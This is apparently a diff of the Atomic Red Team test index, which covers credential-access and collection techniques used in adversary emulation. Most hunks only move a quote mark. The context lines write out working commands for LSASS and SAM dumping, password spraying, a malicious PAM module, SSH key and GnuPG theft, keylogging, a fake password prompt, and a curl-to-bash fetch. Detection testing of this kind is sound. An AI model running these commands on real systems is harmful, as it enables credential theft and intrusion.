network, firewall or permissions (must be admin on target) - ' +' executor: command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with Powershell @@ -4500,11 +4500,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4530,11 +4530,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4577,14 +4577,14 @@ credential-access: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". - ' +' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. - ' +' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -4592,7 +4592,7 @@ credential-access: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 - ' +' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture @@ -4759,10 +4759,10 @@ credential-access: dependencies: - description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe}) - ' +' prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" @@ -4827,7 +4827,7 @@ credential-access: C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1110.002: @@ -4995,7 +4995,7 @@ credential-access: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -5008,14 +5008,14 @@ credential-access: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -5107,7 +5107,7 @@ credential-access: description: 'Attempts to brute force a single Active Directory account by testing connectivity to the IPC$ share on a domain controller - ' +' supported_platforms: - windows input_arguments: @@ -5130,7 +5130,7 @@ credential-access: description: 'Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos - ' +' supported_platforms: - windows input_arguments: @@ -5180,7 +5180,7 @@ credential-access: auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69 description: 'Attempt to brute force Azure AD user via AzureAD powershell module. - ' +' supported_platforms: - azure-ad input_arguments: @@ -5197,14 +5197,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: name: powershell elevation_required: false @@ -5236,7 +5236,7 @@ credential-access: dependencies: - description: 'Check if running on a Debian based machine. - ' +' prereq_command: | if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi @@ -5244,7 +5244,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'apt-get update && apt-get install -y openssl sudo - ' +' executor: elevation_required: true command: | @@ -5267,7 +5267,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target - ' +' name: sh - name: SUDO brute force Redhat auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade @@ -5279,7 +5279,7 @@ credential-access: dependencies: - description: 'Check if running on a Redhat based machine. - ' +' prereq_command: | if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi @@ -5287,7 +5287,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'yum -y update && yum install -y openssl sudo - ' +' executor: elevation_required: true command: | @@ -5310,7 +5310,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target - ' +' name: sh T1555.005: technique: @@ -5476,13 +5476,13 @@ credential-access: dependencies: - description: 'List of domain users to password spray must exits at %temp%\users.txt - ' +' prereq_command: 'if not exist %temp%\users.txt (exit /b 1) - ' +' get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat - ' +' executor: name: command_prompt elevation_required: false @@ -5490,7 +5490,7 @@ credential-access: /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL - ' +' - name: Password Spray (DomainPasswordSpray) auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b description: | @@ -5589,14 +5589,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: name: powershell elevation_required: false @@ -5716,10 +5716,10 @@ credential-access: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | @@ -5753,35 +5753,35 @@ credential-access: - description: 'The PAM development library must be installed to build the PAM module - ' +' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi - ' +' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) - ' +' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} - ' +' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' T1552.004: technique: id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf @@ -5856,14 +5856,14 @@ credential-access: executor: command: 'dir c:\ /b /s .key | findstr /e .key - ' +' name: command_prompt elevation_required: true - name: Discover Private SSH Keys auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 description: 'Discover private SSH keys on a macOS or Linux system. - ' +' supported_platforms: - macos - linux @@ -5879,17 +5879,17 @@ credential-access: executor: command: 'find #{search_path} -name id_rsa >> #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Copy Private SSH Keys with CP auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 description: 'Copy private SSH keys on a Linux system to a staging folder using the `cp` command. - ' +' supported_platforms: - linux input_arguments: @@ -5907,14 +5907,14 @@ credential-access: find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \; cleanup_command: 'rm #{output_folder} - ' +' name: sh - name: Copy Private SSH Keys with rsync auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a description: 'Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. - ' +' supported_platforms: - macos - linux @@ -5933,14 +5933,14 @@ credential-access: find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} - ' +' name: sh - name: Copy the users GnuPG directory with rsync auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command. - ' +' supported_platforms: - macos - linux @@ -5959,7 +5959,7 @@ credential-access: find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} - ' +' name: sh - name: ADFS token signing and encryption certificates theft - Local auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f @@ -5972,13 +5972,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. - ' +' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AADInternals -Force - ' +' executor: command: | Import-Module AADInternals -Force @@ -6018,14 +6018,14 @@ credential-access: dependencies: - description: 'AADInternals and ActiveDirectory modules must be installed. - ' +' prereq_command: 'if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1} - ' +' get_prereq_command: 'Install-Module -Name AADInternals -Force - ' +' executor: command: "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc @@ -6120,7 +6120,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist - ' +' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6141,7 +6141,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" - ' +' - name: Dump individual process memory with Python (Local) auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | @@ -6169,7 +6169,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist - ' +' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6178,11 +6178,11 @@ credential-access: echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - description: 'Requires Python - ' +' prereq_command: "(which python || which python3 || which python2)\n" get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed" - ' +' executor: name: sh elevation_required: true @@ -6194,7 +6194,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" - ' +' T1606.002: technique: external_references: @@ -6289,13 +6289,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. - ' +' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AADInternals -Force - ' +' executor: command: | Import-Module AADInternals -Force @@ -6383,42 +6383,42 @@ credential-access: auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 description: 'Parses registry hives to obtain stored credentials - ' +' supported_platforms: - windows dependency_executor_name: command_prompt dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'pypykatz must be installed and part of PATH - ' +' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz - ' +' executor: command: 'pypykatz live registry - ' +' name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -6444,12 +6444,12 @@ credential-access: executor: command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} - ' +' name: command_prompt elevation_required: true cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1 - ' +' - name: PowerDump Registry dump of SAM for hashes and usernames auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hasshes from the registry. @@ -6501,7 +6501,7 @@ credential-access: auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 description: 'Dump hives from volume shadow copies with System.IO.File - ' +' supported_platforms: - windows input_arguments: @@ -7315,7 +7315,7 @@ collection: elevation_required: false command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} - ' +' cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore' T1560.003: technique: @@ -7411,7 +7411,7 @@ collection: auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 description: 'Uses GZip from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7427,10 +7427,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -7438,15 +7438,15 @@ collection: command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'', ''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using bz2 in Python (Linux) auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d description: 'Uses bz2 from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7462,25 +7462,25 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash elevation_required: false command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using zipfile in Python (Linux) auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 description: 'Uses zipfile from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7496,10 +7496,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -7507,15 +7507,15 @@ collection: command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'', mode=''w'').write(''#{path_to_input_file}'')" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using tarfile in Python (Linux) auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db description: 'Uses tarfile from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7531,10 +7531,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -7543,7 +7543,7 @@ collection: mode='w').write('#{path_to_input_file}')\" \n" cleanup_command: 'rm #{path_to_output_file} - ' +' T1560.001: technique: created: '2020-02-20T21:01:25.428Z' @@ -7626,10 +7626,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) - ' +' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7639,10 +7639,10 @@ collection: elevation_required: false command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} - ' +' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 - ' +' - name: Compress Data and lock with password for Exfiltration with winrar auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c description: | @@ -7662,10 +7662,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) - ' +' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7703,11 +7703,11 @@ collection: dependencies: - description: 'Winzip must be installed - ' +' prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo 0)'' - ' +' get_prereq_command: | if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue @@ -7727,7 +7727,7 @@ collection: auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 description: 'Note: Requires 7zip installation - ' +' supported_platforms: - windows input_arguments: @@ -7742,10 +7742,10 @@ collection: dependencies: - description: '7zip tool must be installed at specified location (#{7zip_exe}) - ' +' prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading 7-zip installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} @@ -7764,7 +7764,7 @@ collection: description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. - ' +' supported_platforms: - linux - macos @@ -7781,11 +7781,11 @@ collection: dependencies: - description: 'Files to zip must exist (#{input_files}) - ' +' prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | (which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip) echo Please set input_files argument to include files that exist @@ -7794,16 +7794,16 @@ collection: elevation_required: false command: 'zip #{output_file} #{input_files} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: Data Compressed - nix - gzip Single File auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - ' +' supported_platforms: - linux - macos @@ -7823,16 +7823,16 @@ collection: command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}'' >> #{input_file}; gzip -k #{input_file}) - ' +' cleanup_command: 'rm -f #{input_file}.gz - ' +' - name: Data Compressed - nix - tar Folder or File auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - ' +' supported_platforms: - linux - macos @@ -7848,28 +7848,28 @@ collection: dependencies: - description: 'Folder to zip must exist (#{input_file_folder}) - ' +' prereq_command: 'test -e #{input_file_folder} - ' +' get_prereq_command: 'echo Please set input_file_folder argument to a folder that exists - ' +' executor: name: sh elevation_required: false command: 'tar -cvzf #{output_file} #{input_file_folder} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: Data Encrypted with zip and gpg symmetric auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f' description: 'Encrypt data for exiltration - ' +' supported_platforms: - macos - linux @@ -7892,7 +7892,7 @@ collection: prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" executor: @@ -7906,7 +7906,7 @@ collection: ls -l #{test_folder} cleanup_command: 'rm -Rf #{test_folder} - ' +' T1123: technique: id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 @@ -7956,7 +7956,7 @@ collection: executor: command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet - ' +' name: powershell T1119: technique: @@ -8026,7 +8026,7 @@ collection: for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1 - ' +' name: command_prompt - name: Automated Collection PowerShell auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 @@ -8042,7 +8042,7 @@ collection: cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | Out-Null - ' +' name: powershell - name: Recon information for export with PowerShell auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 @@ -8131,7 +8131,7 @@ collection: auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 description: 'Add data to clipboard to copy off or execute commands from. - ' +' supported_platforms: - windows executor: @@ -8141,14 +8141,14 @@ collection: clip < %temp%\T1115.txt cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 - ' +' name: command_prompt - name: Execute Commands from Clipboard using PowerShell auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 description: 'Utilize PowerShell to echo a command to clipboard and execute it - ' +' supported_platforms: - windows executor: @@ -8171,7 +8171,7 @@ collection: description: 'This module copies the data stored in the user''s clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt - ' +' supported_platforms: - windows input_arguments: @@ -8183,7 +8183,7 @@ collection: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -8194,7 +8194,7 @@ collection: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -8204,7 +8204,7 @@ collection: cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore - ' +' name: powershell T1213.001: technique: @@ -8354,7 +8354,7 @@ collection: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications - ' +' supported_platforms: - windows input_arguments: @@ -8370,10 +8370,10 @@ collection: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -8926,7 +8926,7 @@ collection: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' - ' +' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -9097,7 +9097,7 @@ collection: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -9116,14 +9116,14 @@ collection: dependencies: - description: 'Checking if pam_tty_audit.so is installed - ' +' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' - ' +' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" - ' +' supported_platforms: - linux executor: @@ -9154,14 +9154,14 @@ collection: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. - ' +' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -9171,7 +9171,7 @@ collection: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND - ' +' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -9188,14 +9188,14 @@ collection: dependencies: - description: 'This test requires to be run in a bash shell - ' +' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' input_arguments: output_file: name: output_file @@ -9211,7 +9211,7 @@ collection: cat #{output_file} cleanup_command: 'rm #{output_file} - ' +' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. @@ -9219,20 +9219,20 @@ collection: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' input_arguments: user_account: description: Basic ssh user account for testing. @@ -9246,7 +9246,7 @@ collection: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ - ' +' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -9258,14 +9258,14 @@ collection: dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -9274,7 +9274,7 @@ collection: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd - ' +' T1557.001: technique: external_references: @@ -9448,17 +9448,17 @@ collection: command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file} - ' +' cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore - ' +' name: powershell - name: Stage data from Discovery.sh auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 description: 'Utilize curl to download discovery.sh and execute a basic information gathering shell script - ' +' supported_platforms: - linux - macos @@ -9471,7 +9471,7 @@ collection: command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} - ' +' name: bash - name: Zip a Folder with PowerShell for Staging in Temp auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a @@ -9493,10 +9493,10 @@ collection: command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force - ' +' cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore - ' +' name: powershell T1114.001: technique: @@ -9567,23 +9567,23 @@ collection: dependencies: - description: 'Get-Inbox.ps1 must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1" - ' +' executor: command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 -file #{output_file} - ' +' cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore - ' +' name: powershell T1185: technique: @@ -9923,7 +9923,7 @@ collection: or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) - ' +' name: Screen Capture created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688 @@ -9955,7 +9955,7 @@ collection: auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac description: 'Use screencapture command to collect a full desktop screenshot - ' +' supported_platforms: - macos input_arguments: @@ -9966,16 +9966,16 @@ collection: executor: command: 'screencapture #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Screencapture (silent) auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 description: 'Use screencapture command to collect a full desktop screenshot - ' +' supported_platforms: - macos input_arguments: @@ -9986,17 +9986,17 @@ collection: executor: command: 'screencapture -x #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: X Windows Capture auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac description: 'Use xwd command to collect a full desktop screenshot and review file with xwud - ' +' supported_platforms: - linux input_arguments: @@ -10018,11 +10018,11 @@ collection: dependencies: - description: 'Package with XWD and XWUD must exist on device - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: | @@ -10030,14 +10030,14 @@ collection: xwud -in #{output_file} cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Capture Linux Desktop using Import Tool auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 description: 'Use import command from ImageMagick to collect a full desktop screenshot - ' +' supported_platforms: - linux input_arguments: @@ -10048,28 +10048,28 @@ collection: dependencies: - description: 'ImageMagick must be installed - ' +' 